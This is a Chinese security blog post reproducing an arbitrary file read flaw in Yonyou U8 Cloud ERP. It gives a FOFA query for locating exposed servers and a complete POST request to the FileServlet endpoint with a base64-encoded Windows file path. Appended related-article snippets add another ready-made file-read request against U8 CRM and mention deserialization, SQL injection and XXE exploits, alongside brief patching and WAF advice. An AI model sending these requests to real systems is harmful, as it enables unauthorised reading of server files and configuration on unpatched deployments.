【漏洞复现】用友U8C任意文件读取漏洞

已于 2024-03-27 00:55:05 修改
阅读量542 收藏 1
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2024-03-26 21:08:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KKleeeaa/article/details/137057707

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01FOFA语句

app="用友-U8-Cloud"

0x02 漏洞POC

路径 是经过base64加密后的内容

POST /servlet/nc.bs.hr.tools.trans.FileServlet HTTP/1.1
Host: ip/host
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

path=QzovV2luZG93cy93aW4uaW5p

漏洞复现用友-U8C-反序列化-ClientRequestDispatch
知黑而守白
04-19 349
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C ClientRequestDispatch接口存在反序列化漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
漏洞复现用友-U8C-verify-sql注入
知黑而守白
02-28 190
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud verify 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
用友U8C数据字典V25.rar
03-26
U8cloud V2.5数据字典,适用于u8cloud2.5-2.7版本,更高版本仅少量表有差异
漏洞复现用友-U8C-XXE-smartweb2
知黑而守白
05-15 203
用友UAP平台是一体化平台,其中包括了开发平台、集成平台、动态建模平台、商业分析平台(用友BQ)、数据处理平台(用友AE)、云管理平台和运行平台等7个领域产品,这些平台产品涵盖了软件应用的全生命周期和IT服务管理过程,用于全面支撑平台化企业,可以为大中型企业与公共组织构建信息化平台提供核心工具与服务用友UPA系统 smartweb2 接口存在xxe漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
用友U8C-CacheInvokeServlet反序列化(CNVD-2023-91638)
weixin_43567873的博客
03-13 352
用友U8C-CacheInvokeServlet反序列化(CNVD-2023-91638)
java API 调用用友U8C制单
qq_42924837的博客
06-22 1530
3.辅助单位:这个是根据每个公司来的 每个公司都有不同的辅助单位 基本的意思就是 比如你是技术部的 你报销了什么 东西 这个东西就需要作为辅助单位填进去 还有就是你是技术部的 这个技术部也需要座位辅助单位 不过这个是跟公司来的 看公司需要什么。pk_corp 这个是公司在U8C的编码 这一串就是 但是有U8C好像需要加0 我现在的就是 但是有的不需要这个你要问用友 多数应该不用。作为开发 我需要去了解财务的知识 财务的逻辑 还要知道财务的流程 有时候沟通还不能完完全全的按照他们的想法来开发!
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2947
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1580
用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
用友U8 Cloud FileManageServlet任意文件读取(CNVD-2025-07265)
最新发布
m0_50125527的博客
05-26 240
用友U8 Cloud是用友网络推出的云端ERP解决方案,基于成熟的U8+产品架构,为企业提供财务、供应链、生产制造、人力资源等全链条云上管理服务。其采用多租户SaaS模式,支持公有云部署,整合了AI、大数据等新技术,帮助企业实现业财一体化、流程自动化及数据实时分析,尤其适合成长型企业快速实现数字化升级,具备弹性扩展、低成本运维和移动协同等云端优势。
用友-U8C-FileServlet-文件读取(含批量验证poc)
weixin_43567873的博客
04-01 249
用友-U8C-FileServlet-文件读取(含批量验证poc)
业务生成财务凭证接口
08-08
用友凭证
漏洞复现用友-U8C-FileServlet-文件读取
知黑而守白
04-01 233
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8C-FileServlet接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。
用友u8c顾问环境搭建遇到的问题
m0_51116968的博客
01-19 820
搭建用友的u8c顾问环境时遇到的一些问题。
用友u8 注入RCE漏洞利用数据
reaido的博客
07-07 1179
一、漏洞成因 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 二、用于SQL注入的POC POST /Proxy HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.
漏洞复现-用友U8Cloud ServiceDispatcher反序列化漏洞
玄道的网安博客
08-13 2259
在PoC中,代码似乎是发送一个特定的序列化数据到/ServiceDispatcherServlet,然后检查响应是否包含特定的字节序列[]byte{0x72, 0x71, 0x89, 0x01}(可能是某种标识符或特定的序列化对象的标记)。具体的漏洞触发点可能与不当的Java对象序列化处理有关,因为代码中特别检查了响应的Content-Type是否为application/x-java-serialized-object。近期,用友官方收到一则漏洞情报,及时发布了补丁,成功修复了一个前台反序列化漏洞
云解析旗舰版结合U8C(本地部署)应用设置
asdaddsd的博客
02-25 2909
U8c是用友推出的新一代ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。 u8c有两种部署方式,云部署和线下部署,线下部署如何快速实现外网访问是客户应用很关键的体验。 为此金万维通过自身在远程连接多年沉淀,推出云解析旗舰版,让u8c实现快速访问。 一、服务器本机安装U8C并调试正常访问,如下图: 二、安装动态域名解析快解析 1、访问http://www.kuaijiexi.com/下载安装快解析服务器端。如下图: 2、安装完成快解析客户端后,点击“免费注册”,注册..
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
02-28 487
用友U8 Cloud ArchiveVerify SQL注入漏洞复现(含nuclei-poc)
用友U8+CRM 任意文件读取漏洞复现
m0_69931798的博客
10-18 335
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可。getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。body="用友U8CRM"
用友U8+ CRM任意文件上传、任意文件读取 实战
m0_43397796的博客
02-24 2440
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件上传漏洞
用友u8+任意文件读取
01-09
### 关于用友 U8+ 存在任意文件读取漏洞的信息 针对用友 U8+ CRM 系统中存在的多个任意文件读取漏洞安全公告通常由官方发布并提供详细的修复建议和技术支持。以下是综合整理的安全措施和修复方案: #### 1. 升级版本至最新稳定版 厂商会定期更新软件来修补已知的安全缺陷。对于用友 U8+ CRM 用户而言,应当尽快升级到最新的稳定版本以获得必要的补丁和支持[^1]。 #### 2. 应用官方发布的热补丁程序 如果当前使用的版本无法立即升级,则可以联系供应商获取专门为此类高危漏洞设计的紧急修复包——即所谓的“热补丁”。安装这些临时性的修正能够有效缓解风险直至完成全面迁移工作为止[^2]。 #### 3. 修改应用程序逻辑限制外部输入路径参数范围 开发团队应该重新审视涉及文件操作的功能模块,在编码层面加入严格的验证机制确保传入的数据仅限于预期之内;比如限定可访问目录结构、拒绝处理特殊字符组成的字符串等方法都可以显著降低被恶意利用的可能性[^3]。 #### 4. 配置Web应用防火墙(WAF)增强防护能力 部署WAF作为额外的一道防线可以在不改动源码的情况下过滤掉大部分非法请求。通过定义规则集阻止那些试图绕过正常流程去尝试触发此漏洞的行为模式,从而保护现有业务不受影响的同时也为后续整改争取时间窗口[^4]。 ```bash # WAF配置示例(伪代码) if (request.uri.contains("/pub/help.php") && request.queryString.startsWith("..")) { denyRequest(); } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值